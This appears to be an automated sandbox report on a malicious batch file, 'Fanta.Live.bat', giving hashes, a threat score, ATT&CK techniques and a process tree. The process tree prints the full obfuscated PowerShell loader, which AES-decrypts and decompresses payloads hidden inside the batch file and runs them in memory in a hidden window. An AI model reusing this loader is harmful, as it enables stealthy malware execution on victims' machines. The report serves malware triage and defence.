Analysis

  • max time kernel
    117s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    01-07-2024 18:28

General

  • Target

    zvgfd-main/Fanta.Live.bat

  • Size

    470KB

  • MD5

    7d81002800c60fb2b26946fc534b8987

  • SHA1

    085d813ec8bf7f691d48a78011938b4a9f24b5e9

  • SHA256

    0a2bc7043be8903606338c714d20d132b877001c2789f368b30dae44aa80d888

  • SHA512

    b16f7ff8bb002954dd2cc6732a122c25b2b66a75bc26800f1b031014a67a5f5f494b7f2ef1457b5cc93cf4d3a6fe62db3c51812ea413f430bdde144a3b06aa8e

  • SSDEEP

    12288:GUMoYDGcH1BKxCob3At/nb5mdrKIegQ25Mf0/FhP:DUD9HHKlb3Qdm5KIA2p

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta.Live.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1732
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZV95zl/ITrrxGrdsAimI2fwOP1zOtvHSQ193ReYto+k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bvkPHp90/lTTmNOsSK9ONg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WrCYx=New-Object System.IO.MemoryStream(,$param_var); $hOItm=New-Object System.IO.MemoryStream; $JSqsS=New-Object System.IO.Compression.GZipStream($WrCYx, [IO.Compression.CompressionMode]::Decompress); $JSqsS.CopyTo($hOItm); $JSqsS.Dispose(); $WrCYx.Dispose(); $hOItm.Dispose(); $hOItm.ToArray();}function execute_function($param_var,$param2_var){ $DVlGZ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $euKiJ=$DVlGZ.EntryPoint; $euKiJ.Invoke($null, $param2_var);}$nLwlA = 'C:\Users\Admin\AppData\Local\Temp\zvgfd-main\Fanta.Live.bat';$host.UI.RawUI.WindowTitle = $nLwlA;$lbBUo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nLwlA).Split([Environment]::NewLine);foreach ($BNDvA in $lbBUo) { if ($BNDvA.StartsWith('QpwAfllqiaJfGjCUaDLA')) { $GHscV=$BNDvA.Substring(20); break; }}$payloads_var=[string[]]$GHscV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:1104
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2128

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2128-4-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp
      Filesize

      4KB

    • memory/2128-6-0x00000000024A0000-0x00000000024A8000-memory.dmp
      Filesize

      32KB

    • memory/2128-5-0x000000001B150000-0x000000001B432000-memory.dmp
      Filesize

      2.9MB

    • memory/2128-7-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
      Filesize

      9.6MB

    • memory/2128-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
      Filesize

      9.6MB

    • memory/2128-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
      Filesize

      9.6MB

    • memory/2128-10-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
      Filesize

      9.6MB

    • memory/2128-11-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
      Filesize

      9.6MB

    • memory/2128-12-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp
      Filesize

      4KB